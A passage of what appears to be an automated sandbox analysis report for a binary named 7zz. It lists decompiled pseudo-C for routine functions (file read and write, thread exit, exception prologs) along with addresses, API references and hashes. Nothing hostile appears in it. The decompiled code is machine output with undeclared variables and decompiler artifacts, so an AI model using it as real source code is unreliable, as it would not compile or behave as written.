                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 2062786585-0
                                                                                  • Opcode ID: 67be124f8a6059692007feb4e6c0bf1aa0dd9a0595db22b3b05b5781a3304976
                                                                                  • Instruction ID: f1c4790c51f2afa5d83b5d7308df39874a94f843b8eefe83d47d115a6bddce3e
                                                                                  • Opcode Fuzzy Hash: 67be124f8a6059692007feb4e6c0bf1aa0dd9a0595db22b3b05b5781a3304976
                                                                                  • Instruction Fuzzy Hash: 6B01D675A402049EDB20EF26C451ADEBBF5FF84354F00851FE896A32A1CB785649CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00411194 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 93%
                                                                                  			E00411194(void* __ecx, void* __edx) {
				void* _t17;
				intOrPtr* _t19;
				char _t20;
				void* _t36;
				void* _t41;

				_t17 = L0046B890(E00474258, _t41);
				_t36 = __ecx;
				if( *((intOrPtr*)(__edx + 4)) != 0) {
					_t17 = E00408A3B(__edx);
					_t47 = _t17;
					if(_t17 == 0) {
						L0040B521(_t41 - 0x54);
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						_push(__edx);
						_t19 = L0040B0A0(_t41 - 0x1c, _t36);
						 *(_t41 - 4) = 1;
						_t20 = E0040B431(_t41 - 0x54, _t36, _t47,  *_t19); // executed
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						 *((char*)(_t41 - 0xd)) = _t20;
						L00407A18( *((intOrPtr*)(_t41 - 0x1c)));
						if( *((char*)(_t41 - 0xd)) != 0) {
							E00401E26(__edx, _t41 - 0x2c);
						}
						_t17 = L00407A18( *((intOrPtr*)(_t41 - 0x2c)));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t17;
			}








                                                                                  0x00411199
                                                                                  0x004111a5
                                                                                  0x004111ab
                                                                                  0x004111af
                                                                                  0x004111b4
                                                                                  0x004111b6
                                                                                  0x004111bb
                                                                                  0x004111c0
                                                                                  0x004111c4
                                                                                  0x004111ca
                                                                                  0x004111d4
                                                                                  0x004111d8
                                                                                  0x004111dd
                                                                                  0x004111e1
                                                                                  0x004111e7
                                                                                  0x004111f1
                                                                                  0x004111f9
                                                                                  0x004111f9
                                                                                  0x00411201
                                                                                  0x00411206
                                                                                  0x004111b6
                                                                                  0x0041120c
                                                                                  0x00411214

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00411199
                                                                                    • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                                    • Part of subcall function 0040B431: __EH_prolog.LIBCMT ref: 0040B436
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 3f2aa2f0a0685f544a815ae2bafa434bc2f73450f177d8b353e65cf44b4f0f47
                                                                                  • Instruction ID: 608382dd46c2c598823991ebebde0f7aed9941af7d6df7122e602381931aeda8
                                                                                  • Opcode Fuzzy Hash: 3f2aa2f0a0685f544a815ae2bafa434bc2f73450f177d8b353e65cf44b4f0f47
                                                                                  • Instruction Fuzzy Hash: 0E019E31E00258AACF15E7A9D4017EEB7B89F85358F14C0AFE411B32D2CB7C1A08C799
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040C914 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 89%
                                                                                  			E0040C914(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _t17;
				signed int _t18;
				void* _t28;
				void* _t30;

				L0046B890(0x473e64, _t30);
				_push(__ecx);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t17 = E0040C83C(_t30 - 0x10, __ecx,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), __edx,  *((intOrPtr*)(_t30 + 0x10)), 1); // executed
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				_t28 = _t17;
				_t18 =  *(_t30 - 0x10);
				if(_t18 != 0) {
					 *((intOrPtr*)( *_t18 + 8))(_t18);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t28;
			}







                                                                                  0x0040c919
                                                                                  0x0040c91e
                                                                                  0x0040c91f
                                                                                  0x0040c928
                                                                                  0x0040c93b
                                                                                  0x0040c940
                                                                                  0x0040c944
                                                                                  0x0040c946
                                                                                  0x0040c94b
                                                                                  0x0040c950
                                                                                  0x0040c950
                                                                                  0x0040c959
                                                                                  0x0040c961

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040C919
                                                                                    • Part of subcall function 0040C83C: __EH_prolog.LIBCMT ref: 0040C841
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 99378acdd3581c8dad4e7dff9413259cddc864b686160a7ef6cc3208cd7c5292
                                                                                  • Instruction ID: 5a94585eceb8510585562d7b83d4e929578e69876529fb1f756434af7c7637c0
                                                                                  • Opcode Fuzzy Hash: 99378acdd3581c8dad4e7dff9413259cddc864b686160a7ef6cc3208cd7c5292
                                                                                  • Instruction Fuzzy Hash: 9AF05E72A00219EFDB14EF98CC01BEEB779FB44355F10826AB425E7290C7789E00CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405C72 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 84%
                                                                                  			E00405C72(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t14;
				void* _t17;
				void* _t22;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;

				_t32 = __eflags;
				L0046B890(0x4734b8, _t27);
				_push(_t17);
				_push(_t24);
				 *0x490a80 = 0x490ab8;
				 *((intOrPtr*)(_t27 - 0x10)) = _t29 - 0x30;
				 *0x490a7c = E00405F22();
				E004018A2(_t27 - 0x14);
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				 *(_t27 - 4) = 1;
				_t14 = E00403A70(_t17, _t22, _t24, _t32, _t22); // executed
				_t25 = _t14;
				 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
				E00401917(_t27 - 0x14); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t25;
			}














                                                                                  0x00405c72
                                                                                  0x00405c77
                                                                                  0x00405c7f
                                                                                  0x00405c80
                                                                                  0x00405c82
                                                                                  0x00405c8c
                                                                                  0x00405c97
                                                                                  0x00405c9c
                                                                                  0x00405ca1
                                                                                  0x00405ca5
                                                                                  0x00405ca9
                                                                                  0x00405cae
                                                                                  0x00405f05
                                                                                  0x00405f0c
                                                                                  0x00405f18
                                                                                  0x00405f21

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00405C77
                                                                                    • Part of subcall function 00405F22: GetVersionExA.KERNEL32(?), ref: 00405F3C
                                                                                    • Part of subcall function 004018A2: SetConsoleCtrlHandler.KERNEL32(004018DA,00000001,?,?,?,00405CA1), ref: 004018B6
                                                                                    • Part of subcall function 00403A70: __EH_prolog.LIBCMT ref: 00403A75
                                                                                    • Part of subcall function 00403A70: SetFileApisToOEM.KERNEL32 ref: 00403A83
                                                                                    • Part of subcall function 00403A70: GetCommandLineW.KERNEL32 ref: 00403A9E
                                                                                    • Part of subcall function 00401917: SetConsoleCtrlHandler.KERNELBASE(004018DA,00000000,?,?,00405F11), ref: 00401928
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleCtrlH_prologHandler$ApisCommandFileLineVersion
                                                                                  • String ID:
                                                                                  • API String ID: 3811785086-0
                                                                                  • Opcode ID: e9cb7d4847eacb32bd0261b85e1eabd0854b54bd825164040ec013db58bdf870
                                                                                  • Instruction ID: fcab1c6799a526d6cc84579c245541fcc004ed5d2a27ee256b075ce021a0ee51
                                                                                  • Opcode Fuzzy Hash: e9cb7d4847eacb32bd0261b85e1eabd0854b54bd825164040ec013db58bdf870
                                                                                  • Instruction Fuzzy Hash: 9FF0BE72D002459ECB04EBAA980269EBB74EB60368F10857FE412732D1D77C0B04CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040BD9F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 86%
                                                                                  			E0040BD9F(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x48b5b0; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}







                                                                                  0x0040bd9f
                                                                                  0x0040bda2
                                                                                  0x0040bda3
                                                                                  0x0040bdab
                                                                                  0x0040bdad
                                                                                  0x0040bdad
                                                                                  0x0040bdb6
                                                                                  0x0040bdc2
                                                                                  0x0040bdd0
                                                                                  0x0040bdd6

                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040BDC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: 293fb559e6840d76b7e7019225d963716ccc77cfe30249145607202f06dff26f
                                                                                  • Instruction ID: f5b03d0275e53328e8766596d7aa07537ccbbd1802995bf3e8a2da8ce39c38f6
                                                                                  • Opcode Fuzzy Hash: 293fb559e6840d76b7e7019225d963716ccc77cfe30249145607202f06dff26f
                                                                                  • Instruction Fuzzy Hash: 84E0C275600208FBCB01CF95C841B8E7BB9EB48354F20C069F919AA2A0D739AA50DF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046CE2E Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 79%
                                                                                  			E0046CE2E() {
				intOrPtr* _t5;
				void* _t14;
				intOrPtr _t15;

				_t15 =  *((intOrPtr*)(_t14 - 0x18));
				L0046E706( *((intOrPtr*)(_t14 - 0x20)));
				_t5 =  *0x4965a4; // 0x0
				if(_t5 != 0) {
					 *_t5();
				}
				_t13 = E0046E383();
				if(_t6 == 0) {
					E0046D03C(0x10);
				}
				E0046E3EA(_t13);
				ExitThread( *(_t15 + 8));
			}






                                                                                  0x0046ce2e
                                                                                  0x0046ce34
                                                                                  0x0046ce39
                                                                                  0x0046ce40
                                                                                  0x0046ce42
                                                                                  0x0046ce42
                                                                                  0x0046ce4a
                                                                                  0x0046ce4e
                                                                                  0x0046ce52
                                                                                  0x0046ce57
                                                                                  0x0046ce59
                                                                                  0x0046ce63

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitThread
                                                                                  • String ID:
                                                                                  • API String ID: 2158977761-0
                                                                                  • Opcode ID: c5135cbf11f344371f6cf3902ba34674a06b3dda85637e8f4185bdea1e723400
                                                                                  • Instruction ID: 64bb69de8ff6d42c3457098edc656902f5609d49139222b7e3e69db672cf67b2
                                                                                  • Opcode Fuzzy Hash: c5135cbf11f344371f6cf3902ba34674a06b3dda85637e8f4185bdea1e723400
                                                                                  • Instruction Fuzzy Hash: 4CE086319001115FDB2127A2DC0A66F3670AF00354F01002BF8405A260FB598C91469F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042F024 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 82%
                                                                                  			E0042F024(intOrPtr* __ecx, void* __eflags) {
				void* _t10;
				void* _t19;
				intOrPtr _t21;

				L0046B890(0x4776a4, _t19);
				_push(__ecx);
				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
				 *((intOrPtr*)(_t19 - 0x10)) = _t21;
				_t10 = E0042EC5C(__ecx, __eflags,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 0xc)),  *((intOrPtr*)(_t19 + 0x10))); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return _t10;
			}






                                                                                  0x0042f029
                                                                                  0x0042f02e
                                                                                  0x0042f032
                                                                                  0x0042f036
                                                                                  0x0042f042
                                                                                  0x0042f057
                                                                                  0x0042f060

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0042F029
                                                                                    • Part of subcall function 0042EC5C: __EH_prolog.LIBCMT ref: 0042EC61
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 89d83f9e4c00c039be1d184f45ea62dd8a41aa49ca7f469a3101ba73a4b22e09
                                                                                  • Instruction ID: f263eec74e2fdc413f8ce8191d7481965beeba368c6f144b2a49cdf0410d163b
                                                                                  • Opcode Fuzzy Hash: 89d83f9e4c00c039be1d184f45ea62dd8a41aa49ca7f469a3101ba73a4b22e09
                                                                                  • Instruction Fuzzy Hash: 56E04632A00118FBCB01AF8AD801BEE7B38FB453A4F00842BF01556001C3BA99109AA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040BC58 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 75%
                                                                                  			E0040BC58(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                                                                                  0x0040bc5b
                                                                                  0x0040bc62
                                                                                  0x0040bc6e
                                                                                  0x0040bc7c
                                                                                  0x0040bc82

                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(000000FF,?,?,?,00000000,000000FF,?,0040BCA3,?,?,00000000,?,0040BCC9,?,?,00000002), ref: 0040BC6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 119bd35a6ca8e8dfe3fd58043442ef1f0f2720401cd9468696989d7f5503d79e
                                                                                  • Instruction ID: e80a47eef93cbac88b9d1de4091ab22be8c7773048f98afb7b75ce3e7b1ffdc8
                                                                                  • Opcode Fuzzy Hash: 119bd35a6ca8e8dfe3fd58043442ef1f0f2720401cd9468696989d7f5503d79e
                                                                                  • Instruction Fuzzy Hash: DEE0EC75200208FBDB01CF90CC01F8E7BB9FB49754F208058E90596160C375AA64EB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046CE39 Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 75%
                                                                                  			E0046CE39(long _a4) {
				intOrPtr* _t2;

				_t2 =  *0x4965a4; // 0x0
				if(_t2 != 0) {
					 *_t2();
				}
				_t10 = E0046E383();
				if(_t3 == 0) {
					E0046D03C(0x10);
				}
				E0046E3EA(_t10);
				ExitThread(_a4);
			}




                                                                                  0x0046ce39
                                                                                  0x0046ce40
                                                                                  0x0046ce42
                                                                                  0x0046ce42
                                                                                  0x0046ce4a
                                                                                  0x0046ce4e
                                                                                  0x0046ce52
                                                                                  0x0046ce57
                                                                                  0x0046ce59
                                                                                  0x0046ce63

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitThread
                                                                                  • String ID:
                                                                                  • API String ID: 2158977761-0
                                                                                  • Opcode ID: a8c2bd8bc36288136cb985c6ef66aa088bd3311e3ca7684abd4a46ab8bba787c
                                                                                  • Instruction ID: a94cd4d5187b38e27ba911a5e394843a57b7ffb4073ce8cb43cd479127d45c81
                                                                                  • Opcode Fuzzy Hash: a8c2bd8bc36288136cb985c6ef66aa088bd3311e3ca7684abd4a46ab8bba787c
                                                                                  • Instruction Fuzzy Hash: E5D05E31A416226EE6322762DC4AA2F22A49F00754B01002FF8848A260FF598C81419F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0043394A Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 37%
                                                                                  			E0043394A(void* __ecx) {
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t12;

				L0046B890(0x477baa, _t12);
				_push(__ecx);
				_push(0x270);
				_t10 = L004079F2();
				 *((intOrPtr*)(_t12 - 0x10)) = _t10;
				_t7 = 0;
				_t15 = _t10;
				 *((intOrPtr*)(_t12 - 4)) = 0;
				if(_t10 != 0) {
					_t7 = E0042A3CD(_t10, _t15); // executed
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t12 - 0xc));
				return _t7;
			}






                                                                                  0x0043394f
                                                                                  0x00433954
                                                                                  0x00433955
                                                                                  0x00433960
                                                                                  0x00433962
                                                                                  0x00433965
                                                                                  0x00433967
                                                                                  0x00433969
                                                                                  0x0043396c
                                                                                  0x0043396e
                                                                                  0x0043396e
                                                                                  0x00433976
                                                                                  0x0043397e

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0043394F
                                                                                    • Part of subcall function 0042A3CD: __EH_prolog.LIBCMT ref: 0042A3D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 49664c6f3ba43aa1f642359bb80e799efb126460c9142e8bc53b2b48cf8044a7
                                                                                  • Instruction ID: 784fa2737f9a3aecb95f3671ac57fc4e3df94eaba76e5e114e4ffca640bbc759
                                                                                  • Opcode Fuzzy Hash: 49664c6f3ba43aa1f642359bb80e799efb126460c9142e8bc53b2b48cf8044a7
